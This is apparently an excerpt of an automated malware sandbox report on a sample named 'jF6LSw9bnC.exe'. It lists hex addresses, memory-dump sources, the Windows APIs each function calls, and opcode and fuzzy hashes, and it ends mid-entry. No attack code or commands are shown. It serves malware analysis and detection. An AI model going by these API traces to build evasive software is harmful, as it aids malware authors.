0x0106f8ef
0x0106f8f1
0x0106f8f7
0x0106f8fa
0x0106f8fb
0x0106f8fd
0x0106f8ff
0x0106f905
0x0106f909
0x0106f90b
0x0106f90d
0x0106f913
0x0106f916
0x0106f917
0x0106f919
0x0106f91b
0x0106f921
0x0106f924
0x0106f925
0x0106f927
0x0106f929
0x0106f92f
0x0106f932
0x0106f933
0x0106f935
0x0106f937
0x0106f93d
0x0106f940
0x0106f942
0x0106f944
0x0106f946
0x0106f949
0x0106f94b
0x0106f94e
0x0106f950
0x0106f952
0x0106f954
0x0106f954
0x0106f955
0x0106f957
0x0106f95a
0x0106f95b
0x0106f95d
0x0106f95f
0x0106f961
0x0106f967
0x0106f96a
0x0106f970
0x0106f970
0x0106f972
0x0106f973
0x0106f975
0x0106f978
0x0106f97a
0x0106f97c
0x0106f97e
0x0106f981
0x0106f983
0x0106f986
0x0106f988
0x0106f98a
0x0106f98c
0x0106f98f
0x0106f993
0x0106f99a
0x0106f99d
0x0106f9a3
0x0106f9a5
0x0106f9a7
0x0106f9ad
0x0106f9b0
0x0106f9b2
0x0106f9b4
0x0106f9b6
0x0106f9b9
0x0106f9bb
0x0106f9be
0x0106f9bf
0x0106f9c1
0x0106f9c3
0x0106f9c9
0x0106f9cd
0x0106f9cf
0x0106f9d1
0x0106f9d7
0x0106f9dc
0x0106f9de
0x0106f9e0
0x0106f9e3
0x0106f9e5
0x0106f9e8
0x0106f9e9
0x0106f9ea
0x0106f9ec
0x0106f9ef
0x0106f9f7
0x0106f9f8
0x0106f9fa
0x0106f9fc
0x0106f9fd
0x0106fa04
0x0106fa06
0x0106fa08
0x0106fa0a
0x0106fa0b
0x0106fa12
0x0106fa14
0x0106fa16
0x0106fa1b
0x0106fa1e
0x0106fa1f
0x0106fa21
0x0106fa22
0x0106fa24
0x0106fa27
0x0106fa29
0x0106fa2a
0x0106fa2d
0x0106fa30
0x0106fa32
0x0106fa34
0x0106fa34
0x0106fa35
0x0106fa37
0x0106fa3c
0x0106fa3d
0x0106fa3e
0x0106fa40
0x0106fa42
0x0106fa43
0x0106fa4a
0x0106fa4c
0x0106fa4e
0x0106fa51
0x0106fa54
0x0106fa55
0x0106fa57
0x0106fa5a
0x0106fa5c
0x0106fa5e
0x0106fa5f
0x0106fa6a
0x0106fa6c
0x0106fa6c
0x0106fa6d
0x0106fa73
0x0106fa75
0x0106fa77
0x0106fa79
0x0106fa7f
0x0106fa84
0x0106fa86
0x0106fa88
0x0106fa8b
0x0106fa8d
0x0106fa8f
0x0106fa91
0x0106fa93
0x0106fa95
0x0106fa9b
0x0106fa9e

Memory Dump Source

Source File: 00000000.00000002.218646676.0000000000FE2000.00000002.00020000.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.218641142.0000000000FE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.218737474.000000000107A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8896f4aed2a94234c87bcc9ca158c0776746b17fc77457409e7b737481753ab2
Instruction ID: 1f744f3fde290f531a4b930d89f10c1573d52fbc2db82f73bac5234204affec0
Opcode Fuzzy Hash: 8896f4aed2a94234c87bcc9ca158c0776746b17fc77457409e7b737481753ab2
Instruction Fuzzy Hash: 2742EC6158E3D25FD7138B744CB5686BFB0AE1312475E8ADFC0C1CB8E3E258598AC762

Uniqueness

Uniqueness Score: -1.00%

Function 01070078, Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.218646676.0000000000FE2000.00000002.00020000.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.218641142.0000000000FE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.218737474.000000000107A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c27d6f436f07d0624a54a1ca5b1f2e92bd49e0c64df507a3881f6f8eecea890d
Instruction ID: da7886e110aa025b06d8dda87d90eaab7bcf541f043740989650c395135284d5
Opcode Fuzzy Hash: c27d6f436f07d0624a54a1ca5b1f2e92bd49e0c64df507a3881f6f8eecea890d
Instruction Fuzzy Hash: 18D121A294E3D58FD7538B344CB5282BFB09E53120B0E45EBD8D18F8E3E258585EC762

Uniqueness

Uniqueness Score: -1.00%

Function 019D04F0, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0e1cc3cf9b41757a00652e050d852792ea5c7430c3dae32ccd814f6d791474
Instruction ID: 0e53e1269bad2d6202ddfa47d838d59451c92849375efcb55b6c96bca658b51d
Opcode Fuzzy Hash: bd0e1cc3cf9b41757a00652e050d852792ea5c7430c3dae32ccd814f6d791474
Instruction Fuzzy Hash: 44D1F731D2074A8ACB10EFA4D950AADF375FFA5300F509B9AD50977224FB706AD8CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: jF6LSw9bnC.exe PID: 5888 Parent PID: 5864 jF6LSw9bnC.exeCOMMON

Executed Functions

Function 0667CFC6, Relevance: 11.5, APIs: 7, Instructions: 964windowlibraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D047
BuildReasonArray.USER32 ref: 0667D116
DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ArrayBuildExtractIconsInitializeMessageOcclusionPeekPrivateReasonRemoteSessionStateThunk
String ID:
API String ID: 2384340519-0
Opcode ID: 3ece9002d716ec438868e1944a45c8423532719fe7c948931f5a3c91edf58279
Instruction ID: 3a5976f479caa3039ca06799e5fa5d5e706724f53bb07109ed2a5aa725c4cc33
Opcode Fuzzy Hash: 3ece9002d716ec438868e1944a45c8423532719fe7c948931f5a3c91edf58279
Instruction Fuzzy Hash: 93A206B4A01228CFDBA5DF30D89869DB7B6FF88205F1045EAD50AA3744DB359E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 06675A94, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 0667B633

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: eab556efcb5fe760ac4e2d02dbe3504cc27845ad373ab873dbe58bd6aaed8ad6
Instruction ID: 228a61e5c6fbc83a10e3f2e503ccd338db44606a0cb53737cc1183b29060df78
Opcode Fuzzy Hash: eab556efcb5fe760ac4e2d02dbe3504cc27845ad373ab873dbe58bd6aaed8ad6
Instruction Fuzzy Hash: CC5122B0D002188FEB54CFAAD888BDEBBB1BF48314F158129E815BB351DB74A844CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0667CFE7, Relevance: 11.1, APIs: 7, Instructions: 637windowlibraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D047
BuildReasonArray.USER32 ref: 0667D116
DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ArrayBuildExtractIconsInitializeMessageOcclusionPeekPrivateReasonRemoteSessionStateThunk
String ID:
API String ID: 2384340519-0
Opcode ID: c90587b2ef7cd8252a7e64690ed8ec104c090acfedbd7ecda623a71488cdd02b
Instruction ID: c97120d325c5289da58cad15edab1ad906b8ff4b4484ea46502aed15ff10fcac
Opcode Fuzzy Hash: c90587b2ef7cd8252a7e64690ed8ec104c090acfedbd7ecda623a71488cdd02b
Instruction Fuzzy Hash: 006227B4905229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D02C, Relevance: 11.1, APIs: 7, Instructions: 628windowlibraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D047
BuildReasonArray.USER32 ref: 0667D116
DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionUser$ArrayBuildExtractIconsInitializeMessageOcclusionPeekPrivateReasonRemoteSessionStateThunk
String ID:
API String ID: 2384340519-0
Opcode ID: 847fd5ab26fec1fce4f5b8ad4747e4def7cc9d07823c2951a6d174e61a23fc3f
Instruction ID: b475cceb78f426f76edd39496cbd99e5ca47554b2bd5332fa81473a3b4a07ddc
Opcode Fuzzy Hash: 847fd5ab26fec1fce4f5b8ad4747e4def7cc9d07823c2951a6d174e61a23fc3f
Instruction Fuzzy Hash: 9D6217B4905229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D068, Relevance: 9.6, APIs: 6, Instructions: 623windowlibraryCOMMON

Download Yara Rule

APIs

BuildReasonArray.USER32 ref: 0667D116
DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: ArrayBuildDispatcherExceptionExtractIconsInitializeMessageOcclusionPeekPrivateReasonRemoteSessionStateThunkUser
String ID:
API String ID: 4083142245-0
Opcode ID: f9439c349002320296924cefa1714902a5eb7b20989bac307b597f0e7f4e48ce
Instruction ID: e53bf0632a3fd5d1ef655024bd426c8257ff84dd1e402f3dbd48413cf1d94ca7
Opcode Fuzzy Hash: f9439c349002320296924cefa1714902a5eb7b20989bac307b597f0e7f4e48ce
Instruction Fuzzy Hash: 3F5207B4905229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D0AD, Relevance: 9.6, APIs: 6, Instructions: 616windowlibraryCOMMON

Download Yara Rule

APIs

BuildReasonArray.USER32 ref: 0667D116
DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: ArrayBuildDispatcherExceptionExtractIconsInitializeMessageOcclusionPeekPrivateReasonRemoteSessionStateThunkUser
String ID:
API String ID: 4083142245-0
Opcode ID: 620a80e47e18b059e2b44156ed409bfbe8a9de5462df531f7ddd2e5b772ad16b
Instruction ID: 16c37709986ea04f0f986c92d7762f0189388caea476cdf12604f31f182a0b65
Opcode Fuzzy Hash: 620a80e47e18b059e2b44156ed409bfbe8a9de5462df531f7ddd2e5b772ad16b
Instruction Fuzzy Hash: C7520874905229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D0F2, Relevance: 9.6, APIs: 6, Instructions: 609windowlibraryCOMMON

Download Yara Rule

APIs

BuildReasonArray.USER32 ref: 0667D116
DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: ArrayBuildDispatcherExceptionExtractIconsInitializeMessageOcclusionPeekPrivateReasonRemoteSessionStateThunkUser
String ID:
API String ID: 4083142245-0
Opcode ID: 1a5bc53ebff913214c4029f9bd19134ab4edef0b074d5c2284363d73755de384
Instruction ID: 042288b1f8cb7d76fa591fcb918154f9def27911d3c2b5cd834c441a12e23cfe
Opcode Fuzzy Hash: 1a5bc53ebff913214c4029f9bd19134ab4edef0b074d5c2284363d73755de384
Instruction Fuzzy Hash: B9520774A05229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D14D, Relevance: 8.1, APIs: 5, Instructions: 598windowlibraryCOMMON

Download Yara Rule

APIs

DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializeMessageOcclusionPeekPrivateRemoteSessionStateThunkUser
String ID:
API String ID: 1080094156-0
Opcode ID: 6fdcbbd3770c162d18e5fac6f699ba379578f44d9be471925d3f8ca5cac6e0b6
Instruction ID: 2c55f11183ff996f61dc94f4f14a6e143d92746de8c9cb755e4c3c5da0a00800
Opcode Fuzzy Hash: 6fdcbbd3770c162d18e5fac6f699ba379578f44d9be471925d3f8ca5cac6e0b6
Instruction Fuzzy Hash: 00520774A05229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D192, Relevance: 8.1, APIs: 5, Instructions: 591windowlibraryCOMMON

Download Yara Rule

APIs

DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializeMessageOcclusionPeekPrivateRemoteSessionStateThunkUser
String ID:
API String ID: 1080094156-0
Opcode ID: d1befbc4c4126f776d303c8f29a6fcfbf20901d336ecc9ace83a9a2d25792fea
Instruction ID: d20bd5a9af056cf8b0ccf2625056b10694e75969fb828e94ae348c18bedcd5c1
Opcode Fuzzy Hash: d1befbc4c4126f776d303c8f29a6fcfbf20901d336ecc9ace83a9a2d25792fea
Instruction Fuzzy Hash: 34520774A05229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D1D7, Relevance: 8.1, APIs: 5, Instructions: 584windowlibraryCOMMON

Download Yara Rule

APIs

DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializeMessageOcclusionPeekPrivateRemoteSessionStateThunkUser
String ID:
API String ID: 1080094156-0
Opcode ID: a14cdd133f4f19ade37f3a71600172e226adf2080089882314b8a84a711fe751
Instruction ID: 5de48f6a5862aa77a7e0d5df56035e6743cd8906104b3563f64ef026f7627d3d
Opcode Fuzzy Hash: a14cdd133f4f19ade37f3a71600172e226adf2080089882314b8a84a711fe751
Instruction Fuzzy Hash: FE520774A05229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D21C, Relevance: 8.1, APIs: 5, Instructions: 577windowlibraryCOMMON

Download Yara Rule

APIs

DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializeMessageOcclusionPeekPrivateRemoteSessionStateThunkUser
String ID:
API String ID: 1080094156-0
Opcode ID: 9517ed708adfee9dadeb6030989d11afd93cab8306aeacd4f15fa24fb5dee8cd
Instruction ID: 310efb63afdbc15baebf2e8d09a0c870bf8085732e0fd9d4f93438c5230ce6e4
Opcode Fuzzy Hash: 9517ed708adfee9dadeb6030989d11afd93cab8306aeacd4f15fa24fb5dee8cd
Instruction Fuzzy Hash: 40520774A01229CFDBA4DF70D89869DB7B6BF88205F5044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D261, Relevance: 8.1, APIs: 5, Instructions: 570windowlibraryCOMMON

Download Yara Rule

APIs

DwmGetRemoteSessionOcclusionState.USER32 ref: 0667D285
PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializeMessageOcclusionPeekPrivateRemoteSessionStateThunkUser
String ID:
API String ID: 1080094156-0
Opcode ID: b2b789462df0575978187f1f2fecb78ca59c38ad391d3fe7965ac2ef7253f1de
Instruction ID: eb534c7b91c15e19db3bba0c0928ebedf758b0a5b55d9f6c4dc47750ece3a834
Opcode Fuzzy Hash: b2b789462df0575978187f1f2fecb78ca59c38ad391d3fe7965ac2ef7253f1de
Instruction Fuzzy Hash: B9420874A01229CFDBA4DF70D89869DB7B6BF88205F1044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D2A6, Relevance: 6.6, APIs: 4, Instructions: 563windowlibraryCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializeMessagePeekPrivateThunkUser
String ID:
API String ID: 3150619334-0
Opcode ID: 48449d909d5fd4791ab7f05a4f68988e7d5ad742eb8a6f37c8fd1e531965a401
Instruction ID: 264e9de8bfe07e306af8b528ac206027afc4b709861e0f1e4772935b94879abf
Opcode Fuzzy Hash: 48449d909d5fd4791ab7f05a4f68988e7d5ad742eb8a6f37c8fd1e531965a401
Instruction Fuzzy Hash: 8C420874A01229CFDBA4DF70D89869DB7B6BF88205F5044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D2EB, Relevance: 6.6, APIs: 4, Instructions: 554windowlibraryCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 0667D306
PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializeMessagePeekPrivateThunkUser
String ID:
API String ID: 3150619334-0
Opcode ID: 4120f1aae47d38ab7e7de8da650a429cc407ad50b1927edf1014a336cdeefc6d
Instruction ID: 0a08fb314d3925a73bea24d37132e29eddfcb5e6900bad558898a2dea62a84f4
Opcode Fuzzy Hash: 4120f1aae47d38ab7e7de8da650a429cc407ad50b1927edf1014a336cdeefc6d
Instruction Fuzzy Hash: 75420874A01229CFDBA4DF70D89869DB7B6BF88205F5044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 031F691F, Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 031F69A0
GetCurrentThread.KERNEL32 ref: 031F69DD
GetCurrentProcess.KERNEL32 ref: 031F6A1A
GetCurrentThreadId.KERNEL32 ref: 031F6A73

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6ed8cf149c03fec7e8ce4e543082b34b9d6630c251d97c8f145594486ba26cef
Instruction ID: dca87e7901624f222470681a823a4d160a17420ee4715e5a58cc20067d873240
Opcode Fuzzy Hash: 6ed8cf149c03fec7e8ce4e543082b34b9d6630c251d97c8f145594486ba26cef
Instruction Fuzzy Hash: 395175B09053498FDB10CFA9D949B9EFBF1EF89314F2480AAE149A7351CB745844CF66

Uniqueness

Uniqueness Score: -1.00%

Function 031F6940, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 031F69A0
GetCurrentThread.KERNEL32 ref: 031F69DD
GetCurrentProcess.KERNEL32 ref: 031F6A1A
GetCurrentThreadId.KERNEL32 ref: 031F6A73

Memory Dump Source

Source File: 00000003.00000002.474795171.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5516ec385bf2ebcac8709d5e049453197ee108d52e390bce454e36ea8cf3a0cc
Instruction ID: 90101f350485ded374a87e632b70707b49e47599811c10e61135f90b23c06f13
Opcode Fuzzy Hash: 5516ec385bf2ebcac8709d5e049453197ee108d52e390bce454e36ea8cf3a0cc
Instruction Fuzzy Hash: C05142B09002498FDB10CFAADA48B9EFBF1EF88314F248569E119A7350CB755884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0667D327, Relevance: 5.0, APIs: 3, Instructions: 549librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializePrivateThunkUser
String ID:
API String ID: 8322700-0
Opcode ID: d5ad1341a209c827055b207b295e5aa06c755a3f81e129a812fcff4126b6fc1c
Instruction ID: 3b5ad4f10d39bc526fbbf8bc960dd37333ab2c999c79f720070973ffbfb7f585
Opcode Fuzzy Hash: d5ad1341a209c827055b207b295e5aa06c755a3f81e129a812fcff4126b6fc1c
Instruction Fuzzy Hash: E042F874A01229CFDBA4DF70D89869DB7B6BF88205F5044EED60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D36C, Relevance: 5.0, APIs: 3, Instructions: 542librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializePrivateThunkUser
String ID:
API String ID: 8322700-0
Opcode ID: 8c0d3c096d9643b7cdd747c46c6901d76e58cc89d8f4e7fa57d149c61439a413
Instruction ID: 9874853f40389059a7e6197ae5d8b567a3593e8e32d95494d6e31200449dec77
Opcode Fuzzy Hash: 8c0d3c096d9643b7cdd747c46c6901d76e58cc89d8f4e7fa57d149c61439a413
Instruction Fuzzy Hash: 1042F874901229CFDBA4DF70D89869DB7B6BF88205F5044EAD60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D3B1, Relevance: 5.0, APIs: 3, Instructions: 535librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializePrivateThunkUser
String ID:
API String ID: 8322700-0
Opcode ID: 5a7ccdb79af58d7ee3dc662844d9be49bc691bf0f7640cb61eeb37fa07581d0c
Instruction ID: fc2a9f82dce664b96d5eff3468910ec9a7d05879db1666dbfaf606d2c944bd5d
Opcode Fuzzy Hash: 5a7ccdb79af58d7ee3dc662844d9be49bc691bf0f7640cb61eeb37fa07581d0c
Instruction Fuzzy Hash: 7B4208B4901229CFDBA4DF70D89869DB7B6FF88205F5044EAD60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D3F6, Relevance: 5.0, APIs: 3, Instructions: 528librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconsW.USER32 ref: 0667D41A
KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionExtractIconsInitializePrivateThunkUser
String ID:
API String ID: 8322700-0
Opcode ID: 63c648f9587c5d63f08f4895f5331bcf56cdb9a07197153a9510a63c93a740b8
Instruction ID: 6d98f1733e980ab468a8b2350604c437ad6e490e3766f4b2e599e9af89835574
Opcode Fuzzy Hash: 63c648f9587c5d63f08f4895f5331bcf56cdb9a07197153a9510a63c93a740b8
Instruction Fuzzy Hash: F04208B4901229CFDBA4DF70D89869DB7B6FF88205F5044EAD60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667C580, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 563COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 0667CF17

Strings

a, xrefs: 0667C584

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: MultipleObjectsWait
String ID: a
API String ID: 862713236-3904355907
Opcode ID: c2c0e5d9a5898eae0184ed695613b77e1a91a4622fd886b1afc0cb7c183a2a11
Instruction ID: 0fa9ffd36815eb53a47ae3fb206578d0c7c89827b6ffc8f553caea785907a013
Opcode Fuzzy Hash: c2c0e5d9a5898eae0184ed695613b77e1a91a4622fd886b1afc0cb7c183a2a11
Instruction Fuzzy Hash: 7E420CB4A002258FCB649F24D898BEDBBB6FF89305F5045D9D90AA7384DB306F858F54

Uniqueness

Uniqueness Score: -1.00%

Function 0667D43B, Relevance: 3.5, APIs: 2, Instructions: 519libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 9421dc58a51ff6dec299c63331f4d1d9e7e6618996d15f378217f12101a2b79a
Instruction ID: 2c27dc295c28f2a76aa32e093a14982c6f24e2ec792e6962fb71bfced0518fdc
Opcode Fuzzy Hash: 9421dc58a51ff6dec299c63331f4d1d9e7e6618996d15f378217f12101a2b79a
Instruction Fuzzy Hash: 763209B4901229CFDBA4DF70D89869DB7B6FF88205F5044EAD60AA3744DB349E85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0667D477, Relevance: 3.5, APIs: 2, Instructions: 514libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0667D972
LdrInitializeThunk.NTDLL ref: 0667DDBF

Memory Dump Source

Source File: 00000003.00000002.480950695.0000000006670000.00000040.00000001.sdmp, Offset: 06670000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 375950b2da1d4ec6edf8244fa2b13d7eee6ec998b1d244ff963e227d800af43b
Instruction ID: c0b6ca4bd85d915be520be87260bdd029689986f2c3c3064b4ff33c2767b3d8c
Opcode Fuzzy Hash: 375950b2da1d4ec6edf8244fa2b13d7eee6ec998b1d244ff963e227d800af43b
Instruction Fuzzy Hash: 763209B4901229CFDBA4DF70D89869DB7B6FF88205F5044EAD60AA3744DB349E85CF60

Uniqueness

